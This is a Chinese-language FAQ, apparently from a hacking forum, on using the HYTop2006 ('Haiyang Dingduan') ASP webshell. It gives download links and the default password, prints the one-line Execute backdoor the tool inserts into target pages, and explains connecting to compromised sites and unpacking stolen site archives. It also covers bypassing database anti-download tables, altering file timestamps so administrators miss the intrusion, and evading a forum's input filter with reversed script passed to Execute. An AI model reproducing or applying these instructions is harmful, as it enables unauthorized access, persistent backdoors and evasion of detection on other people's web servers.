经常看到新手问海洋顶端ASP木马的相关问题 
这里我收集一些常见问题，并给予回答！ 
———————————————————————————————————————————————

=文件说明===================================================== 
2006.asp                海阳顶端网ASP木马2006版文件 
unpack.vbs                打包文件"HYTop.mdb"的解开器 
2006X.exe                海阳顶端网ASP木马2006 C/S模式转换器 
2006X2.exe                海阳顶端网ASP木马2006 专用短服务器端 
                        C/S模式转换器 
2006Z.exe                海阳顶端网ASP木马2006_Lite版本组合器 
                        用来自定义生成相应功能的Lite版木马 
hididi.ini                2006Z.exe的配置文件 
============================================================== 

=2006X.exe使用说明============================================ 
先按"打开"选择木马文件，然后按转换，默认会生成一个.htm的客户端 
执行文件，打开这个文件后，填上木马服务端地址及访问密码，按“提 
交”后开始上传木马程序内容到达服务器内存，提交成功后就可以像使 
用传统版本的海阳木马一样使用它了，同样方便。 
服务端的生成也由本程序完成，先填写好服务端密码，然后按“生成服 
务端页面”，选择好存放路径及文件名，记住密码，要用的时候把这个 
文件传到服务器上就可以了。 
2006X2.exe生成的是短服务器端的，要求客户端和服务端密码完全一致 
============================================================== 

=2006Z.exe使用说明============================================ 
打开程序后，你可以在“页面选择”框架里选择所需要生成的Lite版海 
阳顶端网ASP木马功能模块，“页面生成”框架里的源文件指的是Full 
版的海阳顶端网ASP木马2006(本文件夹中的2006a.asp)，选择好相应 
的源文件及生成文件后，按“生成”即可生成相应功能组合的海阳顶端 
网ASP木马2006_Lite版。 
hididi.ini里保存的是各个功能模块所需要的相关函数集合，请不要修 
改，否则生成的文件将不可使用。 
============================================================== 

=衷心感谢===================================================== 
网辰在线、化境编程、桂林老兵、冰狐浪子、蓝屏、小路、wangyong、 
czy、allen、lcx、Marcos、kEvin1986、myth对海阳顶端网asp木马所 
做的一切努力！ 
============================================================== 

=本版关于===================================================== 
程序编写: Marcos 
联系方式: QQ26696782 
发布时间: 2005.03.04 
出 品 人: Allen, lcx, Marcos 
官方发布: WWW.HIDIDI.NET(2) WWW.HAIYANGTOP.NET(1) 
其它说明: 可能出现的修正版及升级版本也会及时在官方发布点发布 
============================================================== 

———————————————————————————————————————————————


问题1：我在什么地方能下载到海洋顶端ASP木马呢~ 

回答： 
海阳顶端asp木马下载 
2006正式版 http://www.haiyangtop.net/hytop2006.rar 
2006eval版 http://www.haiyangtop.net/hytopeval.rar 

———————————————————————————————————————————————

问题2： 
就是你们写的小马那个文件打包/揭开。我想知道 文件打包后，我下载下来，是.mdb后缀的，那我来怎么恢复呢，比如说是将一个文件夹打包下载后，来怎么恢复呢？  

回答： 
请用海洋顶端ASP木马2006正式版里的unpack.vbs文件进行解压！ 
mdb的文件名必须为HYTop.mdb（也就是默认的名字) 

______________________________________________________________________________ 


问题3： 
请教,HYTop2006插入后门怎么用? 
如题:已经提示插入成功 
但是怎么使用呀? 
自己打开网址和原来没有变化,是不是还要什么客户端呀? 

回答： 
HYTop2006插入后门 

默认向目标插入 

以下代码 
———————————————————————————————————————————————
If Request("#")<>"" Then Session("#")=Request("#") 
If Session("#")<>"" Then Execute(Session("#")) 
———————————————————————————————————————————————

以上代码 

默认连接密码为# 
请用海洋C/S客户端进行连接 

例如： 
被插入的文件为 top.asp 
WEB浏览地址：http://www.xx.cn/top.asp 

即用海洋C/S客户端 
地址填http://www.xx.cn/top.asp 
连接密码填 # 
连接后 
还要输入登陆密码 
登陆密码默认为：lcxMarcos 
否则为你自己设的密码！ 

———————————————————————————————————————————————

问题4 
关于海洋木马 

海洋木马这功能怎么使？ 
我把人家的站用海洋2006打包了  下载下来。。。传到我的服务器上 然后传了海洋马上去  在我空间里面解包,,,,结果是 没反映？  怎么办？  是不是不是我这么操作的 或者这个功能根本不好用？ 


回答： 
可能是因为你的路径填写错误!或你的空间不支持FSO组件！ 

———————————————————————————————————————————————

问题5： 
用海洋2006上了一个站但是 

我为什么看不到这个站的绝对路径呢? 

我看到的是这种地址: 

本文件绝对路径\\10.2.12.1\944665183\lyb\iloveyou.asp 

请问这是怎么回事? 

回答： 
这是因为对方把WEB服务器设在了内网！ 


———————————————————————————————————————————————
问题6： 
海洋顶端2006的默认密码是？ 

回答： 
默认密码是：lcxMarcos 


———————————————————————————————————————————————
问题7: 
为什么我用<%Execute(Request.form("n"))%>做为短服务端用2006连接却出现如下错误？ 

Microsoft VBScript 运行时错误 ’800a000d’  

类型不匹配: ’Execute’  

\test\top.asp, line 1 

  

回答： 
因为你用的2006版客户端不是其对应的客户端！ 
如果你要用短服务端请换eval版使用！ 

———————————————————————————————————————————————


问题8 
哪个高手能把这个问题解决就好了...:( 
Active Server Pages 错误 ’00000000’  
创建对象失败  
?  
创建对象 ’ws’ 时出错。 ActiveX 部件不能创建对象 

Active Server Pages 错误 ’00000000’  
创建对象失败  
?  
创建对象 ’ws’ 时出错。 缺少对象 

错误: 文件无法被打开。 
错误源: ADODB.Stream 

回答： 
此问题是组建名字被改或被删！ 
请换用SID试试 
如下： 
（） 

———————————————————————————————————————————————

问题9 
已经在数据库(扩展名为asp)内插入后门代码，但数据库内有防下载数据，如何提交后门执行代码啊？用自带的那个不行啊！ 

若以知表名，但如何自定义  

回答： 

notdownloadsExists指的是notdownloads表是否存在,如果它的防下载表名不为notdownloads,而且你也不知道它的表名是什么,那么程序也无能为力.  

查找程序代码里的notdownloads替换为你的表名.  

———————————————————————————————————————————————

问题10 
xxx.asp 
创建时间: 2005-8-29 3:31:16 
最后修改: 2005-8-3 3:31:00 
最后访问: 2005-8-29 3:32:11 

创建时间能改就好了.这样管理员就不容易发现了.  

回答： 
shell.application文件浏览操作器里有最后修改时间可以修改,同时修改创建时间. 

———————————————————————————————————————————————
问题11： 
发现 可以编辑论坛其中的一份XXX.asp文件与css文件.(就是修改欢迎,与CSS模板) 
限制了 不能提交<%，include，Server,...  

回答： 
把脚本反转一下,然后再用Execute执行二次反转后的代码,比如 
 
sStr = ")""psa.MM""(etucexe.revreS" 
Execute(StrReverse(sStr))